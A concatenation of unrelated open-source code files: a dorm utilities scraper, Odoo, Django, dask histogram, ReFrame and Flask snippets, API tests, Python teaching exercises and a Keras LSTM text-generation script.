    for key, value in userbind.RangeIter(include_value = True):
        data = json.loads(value)
        if data.has_key('build') and data.has_key('room'):
            if not checkRoomExist(data['build'], data['room']): # assume rooms already in the list have been queried
                ret = performQuery(data['build'], data['room'])
                if ret:
                    roomCursor.execute('INSERT INTO roomlist (build, room) VALUES (?,?)', (data['build'], data['room']))
                    conn.commit()
                    rid = roomCursor.lastrowid
                    saveResultByRid(rid, ret)
def loadHTTPPool():
    """Parse URL_QUERY and build the shared urllib3 connection pool
    (globals uri_parsed / http_pool)."""
    global uri_parsed, http_pool
    uri_parsed = urlparse.urlparse(URL_QUERY)
    http_pool = urllib3.HTTPConnectionPool(uri_parsed.hostname, uri_parsed.port)
def performQueryForRoomList():
    """Fetch and store today's reading for every known room that does not
    already have one (iterates the roomlist table)."""
    roomCursor.execute('SELECT id, build, room FROM roomlist')
    room = roomCursor.fetchone()
    while room:
        if not checkTodayExistByRid(room[0]):
            ret = performQuery(room[1], room[2])
            if ret:
                saveResultByRid(room[0], ret)
        room = roomCursor.fetchone()
def performQuery(build, room):
    """POST the dorm utilities query and scrape the GBK HTML response.

    Returns None when the page signals an error (history.back()), otherwise
    a dict {'timestamp': int, 'water'/'hotwater'/'electricity':
    {'value': fen, 'money': fen}} with -1 for unparseable cells.
    """
    data = "build={0}&room={1}&xw=%D0%A3%CD%E2%B2%E9%D1%AF".format(build, room)
    req = http_pool.urlopen('POST', uri_parsed.path, headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=data)
    html = req.data.decode('gbk')
    if re.search(REGEX_BACK, html):
        # Error page: server bounces back via history.back().
        return None
    else:
        ret = {}
        time_str = re.search(REGEX_TIME, html).group(1)
        time_datetime = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M %p')
        ret['timestamp'] = int(time.mktime(time_datetime.timetuple()))
        tr_tags = re.findall(REGEX_TR, html)
        for tr_tag in tr_tags:
            # Skip header rows (they contain <th> cells).
            if re.search(REGEX_TH, tr_tag):
                continue
            td_tags = re.findall(REGEX_TD, tr_tag)
            value_match = re.search(REGEX_NUM, td_tags[1])
            if value_match:
                value = str2fen(value_match.group(0))
            else:
                value = -1
            money_match = re.search(REGEX_NUM, td_tags[2])
            if money_match:
                money = str2fen(money_match.group(0))
            else:
                money = -1
            item = {
                'value': value,
                'money': money
            }
            # First cell names the meter: cold water / hot water / electricity.
            if td_tags[0].find(u'冷水表') != -1:
                ret['water'] = item
            if td_tags[0].find(u'热水表') != -1:
                ret['hotwater'] = item
            if td_tags[0].find(u'电表') != -1:
                ret['electricity'] = item
        return ret
def checkRoomExist(build, room):
    """Return the roomlist id for (build, room), or False when absent."""
    cursor.execute('SELECT id FROM roomlist WHERE build=? AND room=? LIMIT 1', (build, room))
    row = cursor.fetchone()
    return row[0] if row else False
def checkTodayExistByRid(rid):
    """True if a data row for `rid` already exists within the last 24 h."""
    now = int(time.time())
    cursor.execute('SELECT * FROM data WHERE rid=? AND time>=?-86400 AND time<? LIMIT 1', (rid, now, now))
    return cursor.fetchone() is not None
def checkExistByRoom(build, room):
    """True if today's reading for the given (build, room) already exists.

    BUG FIX: the original assigned the function object (`checkRoomExist`
    without calling it) and then indexed the `room` argument as if it were
    a dict; it could never work.  Look up the room id, then check today's
    data for that id.
    """
    rid = checkRoomExist(build, room)
    if rid:
        return checkTodayExistByRid(rid)
    else:
        return False
def getYesterdayByRid(rid):
    """Return yesterday's reading row (24-48 h old) for `rid`, or None."""
    now = int(time.time())
    cursor.execute('SELECT water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money FROM data WHERE rid=? AND time>=?-172800 AND time<?-86400 LIMIT 1', (rid, now, now))
    # fetchone() already yields None when no row matches.
    return cursor.fetchone()
def getUsage(today, yesterday):
    """Daily usage delta; -1 (missing reading) propagates through."""
    if -1 in (today, yesterday):
        return -1
    return today - yesterday
def saveResultByRid(rid, data):
    """Insert today's raw reading for `rid` and, when yesterday's reading
    exists, also insert the day-over-day usage row; commits via rowInserted()."""
    saveCursor.execute('INSERT INTO data (rid, time, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money) VALUES (?,?,?,?,?,?,?,?)',
        (rid, data['timestamp'],
        data['water']['value'],
        data['water']['money'],
        data['hotwater']['value'],
        data['hotwater']['money'],
        data['electricity']['value'],
        data['electricity']['money']
        )
    )
    yesterday = getYesterdayByRid(rid)
    if yesterday:
        # Usage row: delta against yesterday's six meter columns.
        saveCursor.execute('INSERT INTO usage (rid, time, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money) VALUES (?,?,?,?,?,?,?,?)',
            (rid, data['timestamp'],
            getUsage(data['water']['value'], yesterday[0]),
            getUsage(data['water']['money'], yesterday[1]),
            getUsage(data['hotwater']['value'], yesterday[2]),
            getUsage(data['hotwater']['money'], yesterday[3]),
            getUsage(data['electricity']['value'], yesterday[4]),
            getUsage(data['electricity']['money'], yesterday[5])
            )
        )
    rowInserted()
def closeDatabase():
    """Flush any pending inserts and close the SQLite connection."""
    conn.commit()
    conn.close()
if __name__ == '__main__':
    # Full nightly run: refresh readings for known rooms, then pick up any
    # newly bound rooms, committing along the way.
    count = 0
    loadConfig()
    initDatabase()
    loadHTTPPool()
    performQueryForRoomList()
    updateRoomList()
    closeDatabase()
    print 'ALL DONE. AFFECTED ROOMS: %d' % count
|
992,160 | 480acc91a85ff8c67923d801a40012ad744c78ee | # -*- coding: utf-8 -*-
# from odoo import http
# class SaleAnticipo(http.Controller):
# @http.route('/sale_anticipo/sale_anticipo/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/sale_anticipo/sale_anticipo/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('sale_anticipo.listing', {
# 'root': '/sale_anticipo/sale_anticipo',
# 'objects': http.request.env['sale_anticipo.sale_anticipo'].search([]),
# })
# @http.route('/sale_anticipo/sale_anticipo/objects/<model("sale_anticipo.sale_anticipo"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('sale_anticipo.object', {
# 'object': obj
# })
|
992,161 | 6262aa40e1855f02015da462646a699d762d9ed3 | import pytest
from feathr import Feature, TypedKey, ValueType, INT32
def test_key_type():
    """TypedKey accepts a ValueType; passing a feature type (INT32) raises."""
    typed_key = TypedKey(key_column="key", key_column_type=ValueType.INT32)
    assert typed_key.key_column_type == ValueType.INT32
    with pytest.raises(KeyError):
        TypedKey(key_column="key", key_column_type=INT32)
def test_feature_type():
    """Feature accepts a feature type (INT32); passing a ValueType raises."""
    anchor_key = TypedKey(key_column="key", key_column_type=ValueType.INT32)
    feature = Feature(name="name", key=anchor_key, feature_type=INT32)
    assert feature.feature_type == INT32
    with pytest.raises(KeyError):
        Feature(name="name", key=anchor_key, feature_type=ValueType.INT32)
992,162 | 716105f3330f230b3cde15f0dc692083745e1c49 | '''class Result:
def __init__(self, value):
self.value = value
def __str__(self):
return f'{self.__class__.__name__}(value={self.value})'
def add_value(self, value: int) -> 'Result':
self.value += value
return self
@classmethod
def get(cls, value) -> 'Result':
return cls(value)
class NewResult(Result):
...
r = NewResult(10)
print(r.add_value(5))
print(NewResult.get(20))
class Node:
def __init__(self, data):
self.data = data
self.next: 'Node'|None = None
self.previous: 'Node'|None = None
node = Node(10)
node.next = Node(20)
node.previous = Node(5)
'''
from typing import Self
class Result:
def __init__(self, value):
self.value = value
def __str__(self):
return f'{self.__class__.__name__}(value={self.value})'
def add_value(self, value: int) -> Self:
self.value += value
return self
@classmethod
def get(cls, value) -> Self:
return cls(value)
class NewResult(Result):
    # Empty subclass demonstrating that Self-annotated methods on Result
    # are typed as returning NewResult here, not the base class.
    ...
class Node:
def __init__(self, data):
self.data = data
self.next: Self|None = None
self.previous: Self|None = None
|
992,163 | 6d267460a8401a769354177356cd7cc7ac1c4956 | from setuptools import setup, find_packages
# Read the long description and license text from the repository root.
with open('README.md') as f:
    readme = f.read()

# NOTE(review): `license` shadows the builtin, and setuptools expects a
# short license identifier here rather than the full LICENSE text --
# confirm intent before changing.
with open('LICENSE') as f:
    license = f.read()

setup(
    name='long_range_convolutions',
    version='0.1.0',
    description='Efficient Long Range Convolutions for Point Clouds',
    long_description=readme,
    author='Leonardo Zepeda-Nunez',
    author_email='zepedanunez@wisc.edu',
    url='https://github.com/Forgotten/BathFitting',
    license=license,
    install_requires=['numpy', 'scipy', 'numba', 'tensorflow'],
    packages=find_packages(),
    classifiers=["Programming Language :: Python :: 3",
                 "License :: MIT License",
                 "Operating System :: OS Independent",],
)
992,164 | e5ce6b873af2584396d5746ecca76554dec190db | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-03-05 10:24
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Rename Dataset.name -> Dataset.title and tighten Resource fields."""

    dependencies = [
        ('idgo_admin', '0102_auto_20190225_1622'),
    ]

    operations = [
        # Column rename only; existing data is preserved.
        migrations.RenameField(
            model_name='dataset',
            old_name='name',
            new_name='title',
        ),
        migrations.AlterField(
            model_name='resource',
            name='ckan_id',
            field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='Ckan UUID'),
        ),
        migrations.AlterField(
            model_name='resource',
            name='name',
            field=models.CharField(max_length=150, verbose_name='Title'),
        ),
        # Access-restriction level choices (labels are user-facing French).
        migrations.AlterField(
            model_name='resource',
            name='restricted_level',
            field=models.CharField(blank=True, choices=[('public', 'Tous les utilisateurs'), ('registered', 'Utilisateurs authentifiés'), ('only_allowed_users', 'Utilisateurs authentifiés avec droits spécifiques'), ('same_organization', 'Utilisateurs de cette organisation uniquement'), ('any_organization', 'Organisations spécifiées')], default='public', max_length=20, null=True, verbose_name="Restriction d'accès"),
        ),
    ]
992,165 | 63b191cd1513b0510da9c358c75a0ba685aae615 | from jetee.base.config_factories_manager import ConfigManager
from jetee.base.config_factory import AnsibleTaskConfigFactory, AnsibleRoleConfigFactory
class TestConfigManager(object):
    """Unit test: ConfigManager aggregates configs produced by its factories."""

    def test_config_manager_manages_config_factories(self):
        # The manager is handed a list of factory classes (duplicates allowed)
        # and is expected to collect each factory's output into one list.
        config_manager = ConfigManager(
            parent=u'',  # this would be kwarg for regular task config
            config_factories_list=[
                AnsibleTaskConfigFactory,
                AnsibleRoleConfigFactory,
                AnsibleTaskConfigFactory
            ]
        )
        configs = config_manager.factory()
        assert isinstance(configs, list)
def batas():
    """Print a horizontal separator line."""
    print("----------------------------------")


def star(x):
    """Print a single row of x stars."""
    print(' * ' * x)


star(5)
batas()


def star_reverse(x):
    """Print rows of stars shrinking from x stars down to one."""
    for width in range(x, 0, -1):
        print(' * ' * width)


star_reverse(5)
batas()


def segitigaAngka(x):
    """Number triangle: '1', '1 2', ... up to x numbers per row."""
    for row in range(1, x + 1):
        print(''.join(str(m) + ' ' for m in range(1, row + 1)))


segitigaAngka(5)
batas()


def segitigaAngkaReverse(x):
    """Number triangle upside down: rows shrink from x numbers to one."""
    for row in range(x, 0, -1):
        print(''.join(str(m + 1) + ' ' for m in range(row)))


segitigaAngkaReverse(5)
batas()


def segitigaAngka2(x):
    """Row i repeats the number i, i times: '1', '2 2', '3 3 3', ..."""
    for i in range(1, x + 1):
        print((str(i) + ' ') * i)


segitigaAngka2(5)
batas()


def segitigaAngka2Reverse(x):
    """Row i repeats the number i, (x - i + 1) times."""
    for i in range(1, x + 1):
        print((str(i) + ' ') * (x - i + 1))


segitigaAngka2Reverse(5)
batas()


def segitigaAngkaBesar(x):
    """Rows count down from x, growing by one number per row."""
    for i in range(1, x + 1):
        print(''.join(str(x - j) + ' ' for j in range(i)))


segitigaAngkaBesar(5)
batas()


def segitigaAngkaBesarReverse(x):
    """Rows count down from x, shrinking by one number per row."""
    for i in range(x):
        print(''.join(str(x - j) + ' ' for j in range(x - i)))


segitigaAngkaBesarReverse(5)
batas()


def pangkat(x, y):
    """Iterative power: x**|y|, returned as 1/result (float) for y <= 0."""
    hasil = 1
    for _ in range(abs(y)):
        hasil *= x
    return hasil if y > 0 else float(1 / hasil)


print(pangkat(2, -1))


# Recursive function: a function that calls itself.
def pangkatB(x, y):
    """Recursive power for non-negative exponents.

    The original only had a base case for y == 1, so any call with
    y <= 0 recursed forever; y <= 0 now terminates and returns 1.
    """
    if y <= 0:
        return 1
    if y == 1:
        return x
    return x * pangkatB(x, y - 1)


def pangpangkat(x, y):
    """Power with negative-exponent support built on pangkatB.

    The original passed the (negative) y straight into pangkatB, which
    never reached its base case; the exponent magnitude is used instead.
    """
    if y > 0:
        return pangkatB(x, y)
    return float(1 / pangkatB(x, abs(y)))


print(pangpangkat(2, 3))


# factorial
def factorial(x):
    """Recursive factorial; any x <= 1 returns 1."""
    return 1 if x <= 1 else x * factorial(x - 1)


print(factorial(4))
|
def stones(N: int, S: str) -> int:
    """Return the minimum number of recolorings so that no white stone
    ('.') appears to the right of the chosen split and no black stone
    ('#') to its left — i.e. all '#' end up on the right.

    Strategy: for every split point, the cost is (blacks before it) +
    (whites after it); take the minimum over all split points.
    """
    # prefix[i]: number of '#' among the first i characters of S.
    prefix = [0]
    for c in S:
        prefix.append(prefix[-1] + (c == '#'))
    # suffix[i]: number of '.' in S[i:].
    suffix = [0] * (N + 1)
    for i in range(N - 1, -1, -1):
        suffix[i] = suffix[i + 1] + (S[i] == '.')
    return min(prefix[i] + suffix[i + 1] for i in range(N))
if __name__ == "__main__":
    # Read N and the stone string from stdin, then print the answer.
    N = int(input())
    S = input()
    ans = stones(N, S)
    print(ans)
|
992,168 | f0719024bc29e76e787c14957588569b9c508fa2 | """Dask-based and dask oriented variants of physt histogram facade functions."""
from __future__ import annotations
from typing import TYPE_CHECKING, cast
import dask
import numpy as np
from dask.array import Array
from physt._facade import h1 as original_h1
from physt._facade import histogramdd as original_hdd
if TYPE_CHECKING:
from typing import Any, Callable, Union
from physt.typing_aliases import ArrayLike
options = {"chunk_split": 16}
def _run_dask(
    *,
    name: str,
    data: Array,
    compute: bool,
    method: Union[None, str, Callable],
    func: Callable,
    expand_arg: bool = False,
) -> Any:
    """Construct the computation graph and optionally compute it.

    :param name: Name of the method (for graph naming purposes).
    :param data: Dask array data
    :param func: Function running of each array chunk.
    :param compute: If True, compute immediately
    :param method: None (linear execution), "threaded" or callable
        to apply when computing.
    :param expand_arg: If True, unpack each chunk key tuple into
        positional arguments for ``func`` instead of passing it whole.
    """
    # One graph node per chunk of the input array.
    if expand_arg:
        graph = dict(
            (f"{name}-{data.name}-{index}", (func, *item))
            for index, item in enumerate(data.__dask_keys__())
        )
    else:
        graph = dict(
            (f"{name}-{data.name}-{index}", (func, item))
            for index, item in enumerate(data.__dask_keys__())
        )
    items = list(graph.keys())
    result_name = f"{name}-{data.name}-result"
    # Merge in the graph that produces the chunks themselves, then reduce
    # all per-chunk results into one with sum() (histograms support "+").
    graph.update(data.dask)
    graph[result_name] = (sum, items)
    if compute:
        if not method:
            return dask.get(graph, result_name)
        if method in ("thread", "threaded", "threading", "threads"):
            return dask.threaded.get(graph, result_name)
        if isinstance(method, str):
            raise ValueError(f"Invalid method name '{method}'.")
        # Any other callable is treated as a dask scheduler get-function.
        return method(graph, result_name)
    # compute=False: hand back the raw graph and the key of its result node.
    return graph, result_name
def histogram1d(data: Union[Array, ArrayLike], bins: Any = None, *, compute: bool = True, **kwargs):
    """Facade function to create one-dimensional histogram using dask.

    Parameters
    ----------
    data: dask.DaskArray or array-like (can have more than one dimension)

    See also
    --------
    physt.histogram
    """
    # Wrap non-dask input into a dask array split into `chunk_split` chunks.
    if not isinstance(data, Array):
        data_np = np.asarray(data)
        data = dask.array.from_array(data_np, chunks=int(data_np.shape[0] / options["chunk_split"]))

    # Per-chunk histograms are merged by addition, which requires adaptive
    # binning; a fixed-binning request is therefore rejected.
    if not kwargs.get("adaptive", True):
        raise ValueError("Only adaptive histograms supported for dask (currently).")
    kwargs["adaptive"] = True

    def block_hist(array):
        # Executed once per chunk inside the dask graph.
        return original_h1(array, bins, **kwargs)

    return _run_dask(
        name="dask_adaptive1d",
        data=cast(Array, data),
        compute=compute,
        method=kwargs.pop("dask_method", "threaded"),
        func=block_hist,
    )


h1 = histogram1d  # Alias for convenience
def histogramdd(data: Union[Array, ArrayLike], bins: Any = None, **kwargs):
    """Facade function to create multi-dimensional histogram using dask.

    Each "column" must be one-dimensional; the input is normalized to a
    2-D dask array of shape (n, dim) chunked only along the first axis.
    """
    from dask.array.rechunk import rechunk

    # A list/tuple of columns is stacked into an (n, dim) array first.
    if isinstance(data, (list, tuple)):
        data = dask.array.stack(data, axis=1)

    if not isinstance(data, Array):
        data = np.asarray(data)
        # Chunk along rows only; each chunk keeps every column.
        data = dask.array.from_array(
            data, chunks=(int(data.shape[0] / options["chunk_split"]), data.shape[1])
        )
    else:
        # Ensure the column axis is not split across chunks.
        data = rechunk(data, {1: data.shape[1]})

    if isinstance(data, dask.array.Array):
        if data.ndim != 2:
            raise ValueError(
                f"Only (n, dim) data allowed for histogramdd, {data.shape} encountered."
            )

    # Same constraint as histogram1d: chunk merging needs adaptive binning.
    if not kwargs.get("adaptive", True):
        raise ValueError("Only adaptive histograms supported for dask (currently).")
    kwargs["adaptive"] = True

    def block_hist(array):
        # Executed once per chunk inside the dask graph.
        return original_hdd(array, bins, **kwargs)

    return _run_dask(
        name="dask_adaptive_dd",
        data=cast(Array, data),
        compute=kwargs.pop("compute", True),
        method=kwargs.pop("dask_method", "threaded"),
        func=block_hist,
        expand_arg=True,
    )
def histogram2d(data1, data2, bins=None, **kwargs):
    """Facade function to create 2D histogram using dask.

    Both inputs are coerced to dask arrays, stacked into an (n, 2) array
    and forwarded to :func:`histogramdd`.
    """
    # TODO: currently very unoptimized! for non-dasks
    if "axis_names" not in kwargs:
        if hasattr(data1, "name") and hasattr(data2, "name"):
            kwargs["axis_names"] = [data1.name, data2.name]
    if not hasattr(data1, "dask"):
        # np.ndarray.size is an attribute, not a method; the original
        # `data1.size()` raised TypeError for every non-dask input.
        data1 = np.asarray(data1)
        data1 = dask.array.from_array(data1, chunks=max(1, data1.size // 100))
    if not hasattr(data2, "dask"):
        data2 = np.asarray(data2)
        data2 = dask.array.from_array(data2, chunks=max(1, data2.size // 100))

    data = dask.array.stack([data1, data2], axis=1)
    kwargs["dim"] = 2
    return histogramdd(data, bins, **kwargs)
h2 = histogram2d # Alias for convenience
def h3(data, bins=None, **kwargs):
    """Facade function to create 3D histogram using dask.

    Thin delegation: presumably expects data shaped (n, 3); the actual
    (n, dim) validation happens inside `histogramdd`.
    """
    return histogramdd(data, bins, **kwargs)
|
992,169 | 767a0c7c227adbb7d693174c555fd432a7a092a6 | from s3ros import s3ros
|
992,170 | fc06599a0724d122a3af99e163820ec3f4a0c327 | # makeArray.py
# Several ways to create NumPy arrays.
import numpy as np

# zeros: create an array/matrix whose elements are all 0.
print(np.zeros(3))
arr = np.zeros((2, 2))
print(arr)

arr2 = np.ones((3, 2))
print(arr2)

# Useful when solving systems of linear equations (Gaussian elimination).
# Creates an identity matrix of size 3.
# A square matrix has the same number of rows and columns.
arr3 = np.eye(3)
print(arr3)

# Create a 2x2 matrix in which every element is 5.
arr4 = np.full((2, 2), 5)
print(arr4)
print('finished')
992,171 | fb35f238e1981e0e9b4f46ab66a71c7de59dd01e | # Copyright 2016-2023 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Generic fallback configuration
#
site_configuration = {
'systems': [
{
'name': 'generic',
'descr': 'Generic example system',
'hostnames': ['.*'],
'partitions': [
{
'name': 'default',
'scheduler': 'local',
'launcher': 'local',
'environs': ['builtin']
}
]
},
],
'environments': [
{
'name': 'builtin',
'cc': 'cc',
'cxx': '',
'ftn': ''
},
],
'logging': [
{
'handlers$': [
{
'type': 'stream',
'name': 'stdout',
'level': 'info',
'format': '%(message)s'
},
],
'handlers': [
{
'type': 'file',
'level': 'debug2',
'format': '[%(asctime)s] %(levelname)s: %(check_info)s: %(message)s', # noqa: E501
'append': False
}
],
'handlers_perflog': [
{
'type': 'filelog',
'prefix': '%(check_system)s/%(check_partition)s',
'level': 'info',
'format': ('%(check_result)s|'
'%(check_job_completion_time)s|%(check_#ALL)s'),
'ignore_keys': [
'check_build_locally',
'check_build_time_limit',
'check_display_name',
'check_executable',
'check_executable_opts',
'check_hashcode',
'check_keep_files',
'check_local',
'check_maintainers',
'check_max_pending_time',
'check_outputdir',
'check_prebuild_cmds',
'check_prefix',
'check_prerun_cmds',
'check_postbuild_cmds',
'check_postrun_cmds',
'check_readonly_files',
'check_sourcepath',
'check_sourcesdir',
'check_stagedir',
'check_strict_check',
'check_tags',
'check_time_limit',
'check_valid_prog_environs',
'check_valid_systems',
'check_variables'
],
'format_perfvars': (
'%(check_perf_value)s|%(check_perf_unit)s|'
'%(check_perf_ref)s|%(check_perf_lower_thres)s|'
'%(check_perf_upper_thres)s|'
),
'append': True
}
]
}
] # end of logging
}
|
992,172 | 63524ad454d1559ef2c06d8d8577a0b6cc3edf98 | from flask import Flask, render_template, request
app = Flask(__name__)

@app.route("/")
def index():
    # Landing page containing the name form posted to /more.
    return render_template("index.html")

@app.route("/more", methods = ["POST"])
def more():
    # Reads the submitted form field and greets the user by name.
    name = request.form.get("name")
    return render_template("more.html", name=name)

@app.route("/list")
def list():
    # NOTE(review): this view function shadows the builtin `list` at
    # module level — consider renaming.
    list=["one", "two", "three", "four", "five"]
    return render_template("list.html", list=list)
|
992,173 | c31762d21c8088d5d50b4d4e4dda9349899c5c96 | #!/usr/bin/env python3
import json
import base64
import unittest
import requests
import random
import time
#DOMAIN = "http://127.0.0.1:11501/"
DOMAIN = "http://webapplication:80/"
BASE_URL = f"{DOMAIN}api"
USERNAME = "simulator"
PWD = "super_safe!"
CREDENTIALS = ":".join([USERNAME, PWD]).encode("ascii")
ENCODED_CREDENTIALS = base64.b64encode(CREDENTIALS).decode()
HEADERS = {
"Connection": "close",
"Content-Type": "application/json",
f"Authorization": f"Basic {ENCODED_CREDENTIALS}",
}
L = 0
def get_latest():
    """Advance the module-wide `latest` counter and return its new value."""
    global L
    L = L + 1
    return L
def is_latest(expected_value: int) -> bool:
    """Return True when the API's /latest endpoint reports *expected_value*."""
    response = requests.get(f"{BASE_URL}/latest", headers=HEADERS)
    return response.json()["latest"] == expected_value
def create_user(username: str) -> requests.Response:
    """Register *username* through the API and assert the call succeeded."""
    data = {"username": username, "email": f"{username}@minitwat.dk", "pwd": PWD}
    # Every mutating call carries a fresh `latest` sequence number, which
    # the server is expected to echo back on /latest.
    latest = get_latest()
    params = {"latest": latest}
    response = requests.post(
        f"{BASE_URL}/register", data=json.dumps(data), headers=HEADERS, params=params,
    )
    assert response.ok, f"could not create {username} ({response.text})"
    assert is_latest(latest)
    return response
class TestStringMethods(unittest.TestCase):
    """End-to-end API walkthrough: register, post, read, follow, unfollow."""

    def test_usage_flow(self):
        # Random hex usernames keep repeated runs from colliding.
        a = hex(hash(random.random()))
        create_user(a)
        assert is_latest(1)
        # Post one message as user `a`.
        data = {"content": "Blub!"}
        url = f"{BASE_URL}/msgs/{a}"
        l = get_latest()
        params = {"latest": l}
        response = requests.post(
            url, data=json.dumps(data), headers=HEADERS, params=params
        )
        assert response.ok, response.text
        assert is_latest(l)
        # The message must appear on the global timeline.
        l = get_latest()
        query = {"no": 20, "latest": l}
        url = f"{BASE_URL}/msgs/"
        response = requests.get(url, headers=HEADERS, params=query)
        assert response.ok, response.text
        assert any(
            msg["content"] == "Blub!" and msg["user"] == a for msg in response.json()
        ), f"`Blub!` not in {response.json()}"
        assert is_latest(l)
        # Test both endpoints
        # ... and on the user's own timeline.
        l = get_latest()
        query = {"no": 20, "latest": l}
        url = f"{BASE_URL}/msgs/{a}"
        response = requests.get(url, headers=HEADERS, params=query)
        assert response.ok, response.text
        assert any(
            msg["content"] == "Blub!" and msg["user"] == a for msg in response.json()
        ), f"`Blub!` not in {response.json()}"
        assert is_latest(l)
        # `a` follows two freshly registered users, `b` and `c`.
        b = hex(hash(random.random()))
        create_user(b)
        c = hex(hash(random.random()))
        create_user(c)
        url = f"{BASE_URL}/fllws/{a}"
        data = {"follow": b}
        l = get_latest()
        params = {"latest": l}
        response = requests.post(
            url, data=json.dumps(data), headers=HEADERS, params=params
        )
        assert is_latest(l)
        assert response.ok, response.text
        data = {"follow": c}
        l = get_latest()
        params = {"latest": l}
        response = requests.post(
            url, data=json.dumps(data), headers=HEADERS, params=params
        )
        assert is_latest(l)
        assert response.ok, response.text
        # Both must show up in a's follow list.
        l = get_latest()
        query = {"no": 20, "latest": l}
        response = requests.get(url, headers=HEADERS, params=query)
        assert response.ok, response.text
        json_data = response.json()
        assert b in json_data["follows"], json_data
        assert c in json_data["follows"], json_data
        assert is_latest(l)
        # first send unfollow command
        data = {"unfollow": b}
        l = get_latest()
        params = {"latest": l}
        response = requests.post(
            url, data=json.dumps(data), headers=HEADERS, params=params
        )
        assert response.ok, response.text
        assert is_latest(l)
        l = get_latest()
        # then verify that b is no longer in follows list
        query = {"no": 20, "latest": l}
        response = requests.get(url, params=query, headers=HEADERS)
        assert response.ok, response.text
        json_data = response.json()
        assert b not in json_data["follows"], json_data
        assert c in json_data["follows"], json_data
        assert is_latest(l)
if __name__ == "__main__":
unittest.main()
|
992,174 | 9bd99c1c28570f9ba27cc8e45646d7dae73a4b51 |
from flask import Flask
import os

app = Flask(__name__)
# Database connection string is injected via the environment (12-factor style).
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

# Imported for its side effects: registers the API routes on `app`.
import api
992,175 | df93dea41e853ebda0acb87d355ff305cc44be9e | #列表list
# Lists
score = [90, 80, 60, 20, 95]
print(score)

frined = ["黑", "黃", "綠"]
# A list may mix value types.
things = [90, "黑", True]
print(things)

# Indexing: 0-based from the front, negative indices count from the back.
print(score[0])
print(score[3])
print(score[-1])
print(score[-2])
# Slicing: start index is inclusive, stop index is exclusive.
print(score[0:2])
print(score[1:4])
print(score[0:])
print(score[:4])

# Strings support the same indexing and slicing.
phrase = "HELLO MR. WHITE"
print(phrase[3])
print(phrase[0:6])

# Item assignment replaces one element in place.
score[0] = 30
print(score)

# append adds one value at the end.
score.append(30)
print(score)
# insert puts a value at a given index.
score.insert(1, 100)
print(score)
# remove deletes the first matching value.
score.remove(80)
print(score)
# pop drops the last element (the original called pop() on a cleared
# list, which raised IndexError).
score.pop()
print(score)

# sort ascending; reverse flips the order in place (the original wrote
# `score.reverse` without parentheses, which does nothing).
score.sort()
print(score)
score.reverse()
print(score)

# index returns the position of a value; count tallies occurrences.
print(score.index(100))
print(score.count(60))

# extend appends every element of another list.
score.extend(frined)
print(score)

# clear empties the list — demonstrated last so the calls above still work.
score.clear()
print(score)
992,176 | 28dc97541eb52424ebf708adfe4769f43dbabce9 | import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from keras.utils import np_utils
import os
import re
import json
# I've used this tutorial: http://machinelearningmastery.com/text-generation-lstm-recurrent-neural-networks-python-keras/.
# I've used this code on FloydHub
def readfile(fname):
    """Read a text file and return its contents lower-cased.

    The corpus is Ukrainian, so decode explicitly as UTF-8 instead of
    relying on the platform default; the context manager also closes the
    handle the original leaked.
    """
    with open(fname, 'r', encoding='utf-8') as f:
        return f.read().lower()
def preprocess(poem):
    """Normalize raw poem text.

    Any character outside the allowed alphabet (Ukrainian/Cyrillic
    letters plus basic punctuation and whitespace) becomes a space;
    tab characters are then converted to newlines.
    """
    cleaned = re.sub('[^!а-яіїєА-ЯІЇЄ\s\,\.\-\—\:\n\!\(\)\?’]', ' ', poem)
    return cleaned.replace('\t', '\n')
folder = '/input/'
# I've decided to use only one book to train
file = 'Stus_Vasyl.Tom_3_1.Palimpsesty.1576.ua.txt'
raw_text = preprocess(readfile(folder + file))

# Character-level vocabulary and its two index mappings.
# NOTE(review): set iteration order varies between runs, so the
# char<->int mapping is not reproducible across processes — confirm.
chars = set(raw_text)
char_to_int = { c:i for i, c in enumerate(chars) }
int_to_char = {i:c for i, c in enumerate(chars)}
# NOTE(review): json.dump converts int_to_char's int keys to strings;
# the loader must convert them back — verify.
with open('/output/char_to_int.json', 'w') as f:
    json.dump(char_to_int, f)
with open('/output/int_to_char.json', 'w') as f:
    json.dump(int_to_char, f)
n_chars = len(raw_text)
n_vocab = len(chars)
print("Total Characters: {}".format(n_chars))
print("Total Vocab: {}".format(n_vocab))

# Build (100-character window -> next character) training pairs.
seq_length = 100
dataX = []
dataY = []
for i in range(0, n_chars - seq_length, 1):
    seq_in = raw_text[i:i + seq_length]
    seq_out = raw_text[i + seq_length]
    dataX.append([char_to_int[char] for char in seq_in])
    dataY.append(char_to_int[seq_out])
n_patterns = len(dataX)
print("Total Patterns: {}".format(n_patterns))
# reshape X to be [samples, time steps, features]
X = numpy.reshape(dataX, (n_patterns, seq_length, 1))
# normalize
X = X / float(n_vocab)
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# define the LSTM model: three stacked 256-unit LSTM layers with dropout,
# softmax over the vocabulary.
model = Sequential()
model.add(LSTM(256, input_shape=(X.shape[1], X.shape[2]), return_sequences=True))
model.add(Dropout(0.4))
model.add(LSTM(256, return_sequences=True))
model.add(Dropout(0.4))
model.add(LSTM(256))
model.add(Dropout(0.4))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# define the checkpoint: only keep weights that improve training loss.
filepath="/output/weights-improvement-{epoch:02d}-{loss:.4f}.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
